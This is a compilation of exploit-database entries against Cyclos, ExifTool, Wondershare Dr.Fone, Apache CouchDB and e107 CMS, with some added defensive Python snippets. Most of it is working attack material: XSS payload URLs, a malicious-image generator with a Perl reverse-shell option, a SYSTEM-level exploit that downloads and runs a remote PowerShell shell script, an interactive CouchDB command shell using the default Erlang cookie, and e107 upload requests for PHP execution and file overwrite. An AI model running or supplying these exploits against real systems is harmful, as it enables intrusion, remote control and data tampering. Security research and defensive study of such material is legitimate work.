<pre><code># Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)<br /># Date: 17/04/2021<br /># Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services<br /># Vendor Homepage: https://www.cyclos.org/<br /># Version: Cyclos 4.14.7 (and prior)<br /># Tested on: Ubuntu<br /># CVE : CVE-2021-31673<br /><br /># Description: <br />A DOM-based cross-site scripting (XSS) vulnerability in the account registration page of Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.<br /><br /># Steps to reproduce: <br />An attacker sends a crafted URL<br /><br />[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to a victim.<br /><br />When the victim opens the URL, the XSS is triggered.<br /><br /><br /><br />-----<br /><br /><br /># Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)<br /># Date: 18/04/2021<br /># Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services<br /># Vendor Homepage: https://www.cyclos.org/<br /># Version: Cyclos 4.14.7 (and prior)<br /># Tested on: Ubuntu<br /># CVE : CVE-2021-31674<br /><br /># Description: <br />Cyclos 4 PRO 4.14.7 and before does not validate user input in its error message, which allows a remote unauthenticated attacker to execute JavaScript code via an undefined enum value.<br /><br /># Steps to reproduce: <br />An attacker sends a crafted URL<br /><br />[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to a victim.<br /><br />When the victim opens the URL, the XSS is triggered.<br /><br /></code></pre>
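Added illustration, not Cyclos code: a Python model of the validation the registration page should apply to the `groupId` fragment parameter (accept only a plain positive integer), plus a helper showing why server-side logs and WAFs never see these payloads: the `#` fragment is not sent to the server. The `route!k=v` fragment layout is assumed from the two URLs above.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed inputs: a benign fragment and the percent-encoded fragment from the advisory above
BENIGN = "#users.users.public-registration!groupId=1"
HOSTILE = ("#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x"
           "%20onerror=alert(document.domain)%3E")

# Cyclos-style fragment: a dotted route name, optionally followed by '!' and k=v&k=v parameters (assumed layout)
_FRAGMENT_RE = re.compile(r"^#?(?P<route>[A-Za-z0-9.\-]+)(?:!(?P<params>.*))?$")


def parse_fragment(fragment):
    """Split 'route!k=v&k2=v2' into (route, {k: v}); values are percent-decoded but not yet trusted."""
    m = _FRAGMENT_RE.match(fragment)
    if not m:
        return None, {}
    params = {}
    for pair in (m.group("params") or "").split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return m.group("route"), params


def safe_group_id(fragment):
    """Return groupId as an int only when it is a plain positive decimal; any other shape is rejected."""
    _, params = parse_fragment(fragment)
    raw = params.get("groupId", "")
    if not re.fullmatch(r"[1-9][0-9]{0,9}", raw):
        return None
    return int(raw)


def server_visible_part(url):
    """What the web server (and so its access log or a WAF) receives: path and query, never the fragment."""
    parts = urlsplit(url)
    return parts.path + ("?" + parts.query if parts.query else "")
```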
<pre><code># Exploit Title: ExifTool 12.23 - Arbitrary Code Execution<br /># Date: 04/30/2022<br /># Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)<br /># Vendor Homepage: https://exiftool.org/<br /># Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip<br /># Version: 7.44-12.23<br /># Tested on: ExifTool 12.23 (Debian)<br /># CVE: CVE-2021-22204<br /># Source: https://github.com/UNICORDev/exploit-CVE-2021-22204<br /># Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image<br /><br />#!/usr/bin/env python3<br /><br /># Imports<br />import base64<br />import os<br />import subprocess<br />import sys<br /><br /># Class for colors<br />class color:<br /> red = '\033[91m'<br /> gold = '\033[93m'<br /> blue = '\033[36m'<br /> green = '\033[92m'<br /> no = '\033[0m'<br /><br /># Print UNICORD ASCII Art<br />def UNICORD_ASCII():<br /> print(rf"""<br />{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}<br />{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}<br />{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}<br />{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}<br /> """)<br /><br /># Print exploit help menu<br />def help():<br /> print(r"""UNICORD Exploit for CVE-2021-22204<br /><br />Usage:<br /> python3 exploit-CVE-2021-22204.py -c <command><br /> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port><br /> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]<br /> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]<br /> python3 exploit-CVE-2021-22204.py -h<br /><br />Options:<br /> -c Custom command mode. 
Provide command to execute.<br /> -s Reverse shell mode. Provide local IP and port.<br /> -i Path to custom JPEG image. (Optional)<br /> -h Show this help menu.<br />""")<br /><br /># Run the exploit<br />def exploit(command):<br /><br /> UNICORD_ASCII()<br /><br /> # Create perl payload<br /> payload = "(metadata \"\c${"<br /> payload += command<br /> payload += "};\")"<br /><br /> print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")<br /> print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")<br /><br /> # Write payload to file<br /> payloadFile = open('payload','w')<br /> payloadFile.write(payload)<br /> payloadFile.close()<br /><br /> # Bzz compress file<br /> subprocess.run(['bzz', 'payload', 'payload.bzz'])<br /><br /> # Run djvumake<br /> subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])<br /><br /> if '-i' in sys.argv:<br /> imagePath = sys.argv[sys.argv.index('-i') + 1]<br /> subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])<br /><br /> else:<br /> # Smallest possible JPEG<br /> image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="<br /><br /> # Write smallest possible JPEG image to file<br /> with open("image.jpg", "wb") as img:<br /> img.write(base64.decodebytes(image))<br /><br /> # Write exiftool config to file<br /> config = (r"""<br /> %Image::ExifTool::UserDefined = (<br /> 'Image::ExifTool::Exif::Main' => {<br /> 0xc51b => {<br /> Name => 'HasselbladExif',<br /> Writable => 'string',<br /> WriteGroup => 'IFD0',<br /> },<br /> },<br /> );<br /> 1; #end<br /> """)<br /> configFile = open('exiftool.config','w')<br /> configFile.write(config)<br /> configFile.close()<br /><br /> # Exiftool config for output image<br /> 
subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])<br /><br /> # Delete leftover files<br /> os.remove("payload")<br /> os.remove("payload.bzz")<br /> os.remove("exploit.djvu")<br /> os.remove("exiftool.config")<br /><br /> # Print results<br /> print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")<br /><br /> exit()<br /><br />if __name__ == "__main__":<br /><br /> args = ['-h','-c','-s','-i']<br /><br /> if args[0] in sys.argv:<br /> help()<br /><br /> elif args[1] in sys.argv and not args[2] in sys.argv:<br /> exec = sys.argv[sys.argv.index(args[1]) + 1]<br /> command = f"system(\'{exec}\')"<br /> exploit(command)<br /><br /> elif args[2] in sys.argv and not args[1] in sys.argv:<br /> localIP = sys.argv[sys.argv.index(args[2]) + 1]<br /> localPort = sys.argv[sys.argv.index(args[2]) + 2]<br /> command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"<br /> exploit(command)<br /><br /> else:<br /> help()<br /> <br /><br /></code></pre>
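Added defender-side example, not part of the UNICORD script or of ExifTool: a minimal JPEG marker walker that flags a DjVu container (`AT&TFORM` magic, optionally with the bzz-compressed `ANTz` annotation chunk the script above builds) hidden inside a JPEG metadata segment, which is where the exploit plants it through the 0xc51b EXIF tag. The sample JPEG is constructed and carries no real scan data; versions after 12.23 fix the parser, so this is a compensating check for ingest pipelines still on older builds.

```python
import struct

DJVU_MAGIC = b"AT&TFORM"   # magic of the DjVu container that djvumake produces
DJVU_ANT_CHUNK = b"ANTz"    # bzz-compressed annotation chunk that carries the payload in the exploit


def iter_jpeg_segments(data):
    """Yield (marker, payload) for every marker segment up to SOS; entropy-coded data is never parsed."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):                    # EOI or SOS: the metadata region is over
            return
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:  # RSTn, SOI, TEM: standalone markers, no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("bad segment length at offset %d" % pos)
        yield marker, data[pos + 4:pos + 2 + length]   # length counts its own two bytes
        pos += 2 + length


def find_embedded_djvu(data):
    """Return [(marker, offset, has_ant_chunk)] for each metadata segment that contains a DjVu container."""
    hits = []
    for marker, payload in iter_jpeg_segments(data):
        if not (0xE0 <= marker <= 0xEF or marker == 0xFE):   # APPn and COM are the free-form segments
            continue
        offset = payload.find(DJVU_MAGIC)
        if offset != -1:
            hits.append((marker, offset, DJVU_ANT_CHUNK in payload))
    return hits


def build_sample_jpeg(app1_extra=b""):
    """Constructed JPEG skeleton (SOI, one APP1/Exif segment, SOS, EOI) used only to exercise the scanner."""
    app1_payload = b"Exif\x00\x00" + app1_extra
    app1 = b"\xff\xe1" + struct.pack(">H", len(app1_payload) + 2) + app1_payload
    return b"\xff\xd8" + app1 + b"\xff\xda" + b"\xff\xd9"
```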
<pre><code># Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)<br /># Date: 4/27/2022<br /># Exploit Author: Netanel Cohen & Tomer Peled<br /># Vendor Homepage: https://drfone.wondershare.net/<br /># Software Link: https://download.wondershare.net/drfone_full4008.exe<br /># Version: up to 12.0.7<br /># Tested on: Windows 10<br /># CVE : CVE-2021-44595<br /># References: https://github.com/netanelc305/WonderShell<br /><br /># Wondershare Dr. Fone (latest version as of 2021-12-06) is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to ElevationService.exe and<br /># execute arbitrary code, without any validation, with SYSTEM privileges.<br /><br />#!/bin/python3<br />import msgpackrpc<br /><br />LADDR = "192.168.14.129"<br />LPORT = 1338<br /><br />RADDR = "192.168.14.137"<br />RPORT = 12345<br /><br />param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"<br />client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))<br />result = client.call('system_s','powershell',param)<br /><br /># stty raw -echo; (stty size; cat) | nc -lvnp 1338<br /><br /></code></pre>
<pre><code># Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)<br /># Date: 2022-01-21<br /># Exploit Author: Konstantin Burov, @_sadshade<br /># Software Link: https://couchdb.apache.org/<br /># Version: 3.2.1 and below<br /># Tested on: Kali 2021.2<br /># Based on 1F98D's Erlang Cookie - Remote Code Execution<br /># Shodan: port:4369 "name couchdb at"<br /># CVE: CVE-2022-24706<br /># References:<br /># https://habr.com/ru/post/661195/<br /># https://www.exploit-db.com/exploits/49418<br /># https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/<br /># https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce<br /># <br />#<br />#!/usr/local/bin/python3<br /><br />import socket<br />from hashlib import md5<br />import struct<br />import sys<br />import re<br />import time<br /><br />TARGET = ""<br />EPMD_PORT = 4369 # Default Erlang distributed port<br />COOKIE = "monster" # Default Erlang cookie for CouchDB <br />ERLNAG_PORT = 0<br />EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list<br /><br /># Some data:<br />NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"<br />CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"<br />CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"<br />CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"<br /><br /><br />def compile_cmd(CMD):<br /> MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"<br /> MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"<br /> MSG += struct.pack(">H", len(CMD))<br /> MSG += bytes(CMD, 'ascii')<br /> MSG += b'jw\x04user'<br /> PAYLOAD = b'\x70' + CTRL_DATA + MSG<br /> PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD<br /> return PAYLOAD<br /><br />print("Remote Command Execution via Erlang Distribution Protocol.\n")<br /><br />while not TARGET:<br /> TARGET = input("Enter target host:\n> ")<br /><br /># Connect to EPMD:<br />try:<br /> epm_socket = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> epm_socket.connect((TARGET, EPMD_PORT))<br />except socket.error as msg:<br /> print("Couldnt connect to EPMD: %s\n terminating program" % msg)<br /> sys.exit(1)<br /> <br />epm_socket.send(EPM_NAME_CMD) #request Erlang nodes<br />if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK<br /> data = epm_socket.recv(1024)<br /> data = data[0:len(data) - 1].decode('ascii')<br /> data = data.split("\n")<br /> if len(data) == 1:<br /> choise = 1<br /> print("Found " + data[0])<br /> else:<br /> print("\nMore than one node found, choose which one to use:")<br /> line_number = 0<br /> for line in data:<br /> line_number += 1<br /> print(" %d) %s" %(line_number, line))<br /> choise = int(input("\n> "))<br /> <br /> ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])<br />else:<br /> print("Node list request error, exiting")<br /> sys.exit(1)<br />epm_socket.close()<br /><br /># Connect to Erlang port:<br />try:<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((TARGET, ERLNAG_PORT))<br />except socket.error as msg:<br /> print("Couldnt connect to Erlang server: %s\n terminating program" % msg)<br /> sys.exit(1)<br /> <br />s.send(NAME_MSG)<br />s.recv(5) # Receive "ok" message<br />challenge = s.recv(1024) # Receive "challenge" message<br />challenge = struct.unpack(">I", challenge[9:13])[0]<br /><br />#print("Extracted challenge: {}".format(challenge))<br /><br /># Add Challenge Digest<br />CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")<br /> + bytes(str(challenge), "ascii")).digest()<br />s.send(CHALLENGE_REPLY)<br />CHALLENGE_RESPONSE = s.recv(1024)<br /><br />if len(CHALLENGE_RESPONSE) == 0:<br /> print("Authentication failed, exiting")<br /> sys.exit(1)<br /><br />print("Authentication successful")<br />print("Enter command:\n")<br /><br />data_size = 0<br />while True:<br /> if data_size <= 0:<br /> CMD = input("> ")<br /> if not CMD:<br /> continue<br /> elif CMD == "exit":<br /> 
sys.exit(0)<br /> s.send(compile_cmd(CMD))<br /> data_size = struct.unpack(">I", s.recv(4))[0] # Get data size<br /> s.recv(45) # Control message<br /> data_size -= 45 # Data size without control message<br /> time.sleep(0.1)<br /> elif data_size < 1024: <br /> data = s.recv(data_size)<br /> #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))<br /> time.sleep(0.1)<br /> print(data.decode())<br /> data_size = 0<br /> else: <br /> data = s.recv(1024)<br /> #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))<br /> time.sleep(0.1)<br /> print(data.decode(),end = '')<br /> data_size -= 1024<br /> <br /><br /></code></pre>
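Added hardening check, not part of the exploit above: the script authenticates with the cookie "monster" that it names as the CouchDB default, so the first thing to audit is the node's vm.args. This audit parses the flag-per-line format, flags the default or a short cookie, and (as an assumed hardening, not something the advisory states) expects the distribution listener to be pinned to an interface with `-kernel inet_dist_use_interface`. Both vm.args samples are constructed.

```python
# Constructed vm.args fragments in the flag-per-line format CouchDB ships
STOCK_VM_ARGS = """
# constructed: what a stock 3.2.1 install looks like
-name couchdb@127.0.0.1
-setcookie monster
-kernel error_logger silent
"""

HARDENED_VM_ARGS = """
# constructed: unique cookie, distribution listener pinned to loopback (assumed hardening)
-name couchdb@127.0.0.1
-setcookie v3Yt8KcxmB1pQ7zHn4eRd0LsWfAgU2jT
-kernel inet_dist_use_interface {127,0,0,1}
"""

DEFAULT_COOKIE = "monster"     # the value the exploit above tries first
MIN_COOKIE_LEN = 20            # assumed threshold; shorter cookies are cheap to brute-force


def parse_vm_args(text):
    """Map each '-flag arguments' line to a list of argument strings; '#' starts a comment, flags may repeat."""
    args = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("-"):
            flag, _, rest = line.partition(" ")
            args.setdefault(flag, []).append(rest.strip())
    return args


def audit_vm_args(text):
    """Return a list of findings; an empty list means this check found nothing to fix."""
    args = parse_vm_args(text)
    findings = []
    cookies = args.get("-setcookie", [])
    cookie = cookies[-1] if cookies else ""      # the last -setcookie wins, as Erlang reads them
    if cookie == DEFAULT_COOKIE:
        findings.append("default cookie '%s': any host reaching the distribution port can complete "
                        "the handshake, exactly as the script above does" % DEFAULT_COOKIE)
    elif cookie and len(cookie) < MIN_COOKIE_LEN:
        findings.append("weak cookie: %d chars, below %d" % (len(cookie), MIN_COOKIE_LEN))
    kernel_opts = " ".join(args.get("-kernel", []))
    if "inet_dist_use_interface" not in kernel_opts:
        findings.append("distribution listener not pinned to an interface "
                        "(assumed hardening: -kernel inet_dist_use_interface {127,0,0,1})")
    return findings
```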
<pre><code># Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities<br /># Date: 30/04/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: snup.php@gmail.com<br /># Vendor Homepage: https://e107.org/<br /># Software Link: https://e107.org/download<br /># Version: 3.2.1<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### XSS Reflected - Via adding comment (Authenticated)<br /><br /># POC<br />Request:<br />GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 08:02:42 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "71d7966eaa95fd8ac14da8baf3e0785d"<br />Content-Length: 25059<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />[...]<br /><div class='media' ><br /><form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' ><br />[...]<br /><br />A user clicks to comment on a news item, types any character into the comment field and then clicks elsewhere outside the field; the injected onchange handler on the form fires.<br /><br /><br />### Upload restriction bypass (Authenticated [Admin]) + Stored XSS<br /><br />An account with administrative privileges can bypass the image upload restriction (stored XSS from an .svg file).<br />image->media manager->upload a file->Image/File URL<br 
/>admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg<br /><br /># POC<br /><br />Request:<br />POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 90<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img<br />Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: iframe<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 02:06:14 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "06ed5ef56b0f736995112cafd77e9ec0"<br />Content-Length: 20878<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr<br />[...]<br /><div class='well clearfix media-carousel-item-container'><br /><a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' 
data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span><br /></a><br />[...]<br /><br /><br />### Upload restriction bypass (Authenticated [Admin]) + RCE<br /><br />Upload and execute a .PHP file<br />The attacker must upload the file to ../../../ (the parent directory), because, for a reason the author did not determine, uploaded PHP code only executes when it is written to that parent directory.<br /><br /><br />Media Manager-> Media Upload/Import -> From a remote location<br /><br /># POC<br /><br />Request:<br />POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import<br />Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 09:02:08 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "5b9621fc78893e36034b14f841f840f8"<br />Content-Length: 26075<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr<br />[...]<br /><br />The uploaded PHP file is visible on the server side.<br /><br /><br />cmd.php file source:<br /><br /><?php<br />system('whoami');<br />?><br /><br /><br />### Upload restriction bypass (Authenticated [Admin]) + Server file overwrite<br /><br />An attacker can overwrite, for example, the top.php file in the web application's main directory.<br />Original top.php file on the server: [screenshot]<br /><br /><br />The file can be overwritten through the following upload functionality:<br />Media Manager-> Media Upload/Import -> From a remote location<br /><br /># POC<br /><br />Request:<br />POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import<br />Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 09:20:10 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "5b9621fc78893e36034b14f841f840f8"<br />Content-Length: 26075<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />[...]<br /><br />The top.php file content was tampered with:<br /><br /></code></pre>
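Added example in Python (illustrative; e107 itself is PHP and this is not its code) of how a remote-import handler should treat the `upload_caption` and `upload_url` values shown in the three requests above: refuse any path syntax instead of repairing it, allow only raster image extensions (so neither .php nor script-capable .svg), verify the bytes match the claimed type, and confirm the final path still resolves under the media root. Function names and the allowlist are assumptions.

```python
import os
import posixpath
from urllib.parse import urlsplit

# Raster formats only: SVG is XML and can carry <script>, so it is deliberately absent
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}


def safe_media_name(caption, remote_url):
    """Derive the stored filename from the caption (or the URL's last path component); None means refuse."""
    name = caption.strip() or posixpath.basename(urlsplit(remote_url).path)
    # Any path syntax in a filename is an attempt to leave the media directory: refuse, don't repair
    if not name or "/" in name or "\\" in name or "\x00" in name or name in (".", ".."):
        return None
    stem, ext = os.path.splitext(name)
    if not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    if os.path.splitext(stem)[1]:          # 'shell.php.png' style double extensions are refused too
        return None
    return stem + ext.lower()


def matches_magic(data, ext):
    """True when the leading bytes match the format the extension claims; a PHP file named .png fails here."""
    if ext == ".webp":
        return data[:4] == b"RIFF" and data[8:12] == b"WEBP"   # RIFF container with the WEBP form type
    return any(data.startswith(sig) for sig in MAGIC.get(ext, ()))


def resolve_under(media_root, name):
    """Absolute target path, or None if it would land outside media_root once '..' and symlinks are resolved."""
    root = os.path.realpath(media_root)
    target = os.path.realpath(os.path.join(root, name))
    return target if os.path.commonpath([root, target]) == root else None
```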
